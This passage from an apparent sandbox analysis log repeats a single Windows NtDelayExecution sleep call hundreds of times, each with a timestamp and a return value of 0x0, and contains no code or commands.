(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.043] NtDelayExecution 